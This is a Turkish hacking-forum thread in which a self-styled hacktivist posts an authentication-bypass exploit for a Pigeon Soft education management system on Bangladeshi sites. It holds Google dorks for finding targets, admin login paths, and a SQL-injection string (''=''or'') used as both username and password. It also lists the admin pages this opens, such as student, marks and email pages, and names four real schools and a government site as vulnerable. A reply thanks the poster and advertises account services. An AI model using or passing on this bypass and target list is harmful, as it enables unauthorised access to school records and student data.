Konuyu Oyla:
  • Toplam: 2 Oy - Ortalama: 3
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: WordPress PigeonSoft Improper Auth Vulnerability
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,371 / 1,371
Deneyim: 87 / 100
Rep Sayısı: 2755
Mesaj Sayısı: 6309
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
WordPress PigeonSoft Improper Auth Vulnerability
04.11.2018 01:04
################################################################################​#################

# Exploit Title : WordPress Developed By Pigeon Soft Bangladesh Education Management Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 03/11/2018
# Vendor Homepage : pigeon-soft.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:''Developed By Pigeon Soft'' site:bd
intext:''Powered By Pigeon Soft'' site:bd
# Exploit Risk : Medium
# CWE : CWE-287 - [ Improper Authentication ] - CWE-592 - [ Authentication Bypass Issues ]
# CxSecurity.Com Exploit Link : cxsecurity.com/ascii/WLB-2018110018

################################################################################​#################

# Admin Panel Login Path :

/app/login.php
/wp-login.php

# Authentication Bypass Exploit :

Admin Username : '=''or'

Admin Password : '=''or'

/app/index.php
/app/add-student.php
/app/students.php
/app/addworkingday.php
/app/studentin.php
/app/student-out.php
/app/report-attendance.php
/app/editmark.php
/app/public/admission-form.php
/app/admission-list.php
/app/admit.php
/app/print-admit.php
/app/update-result.php
/app/new-semester-plan.php
/app/semester-plan.php
/app/member-req.php
/app/update-list.php
/app/memberlist.php
/app/reports.php
/app/public/register-check.php
/app/create-message.php
/app/send-email.php
/app/public/membership.php
/app/update-settings.php

################################################################################​#################

# Example Vulnerable Sites =>

[+] bograpoly.gov.bd/app/index.php

[+] gmmhs.edu.bd/app/login.php

[+] gfisc.edu.bd/app/login.php

[+] itihasacademybd.com/app/login.php

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################
(Bu konu en son: 04.11.2018 Tarihinde, Saat: 01:11 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti
Rep Verenler: Dessy
Dessy
*
avatar
Yarbay
Durum: Çevrimdışı
Seviye Puanı: 21
Yaşam Puanı: 271 / 522
Deneyim: 89 / 100
Rep Sayısı: 102
Mesaj Sayısı: 568
Üyelik Tarihi: 20.11.2015
     
Yorum: #2
RE: WordPress PigeonSoft Improper Auth Vulnerability
08.11.2018 08:29
Emeğine Sağlık :)

İnstagram Sınırsız Hesap > Git
Youtube Sınırsız Hesap > Git
Sosyal Medyada Sınırsız Hesap Açma p2 Yakında.
Alinti



1 Ziyaretçi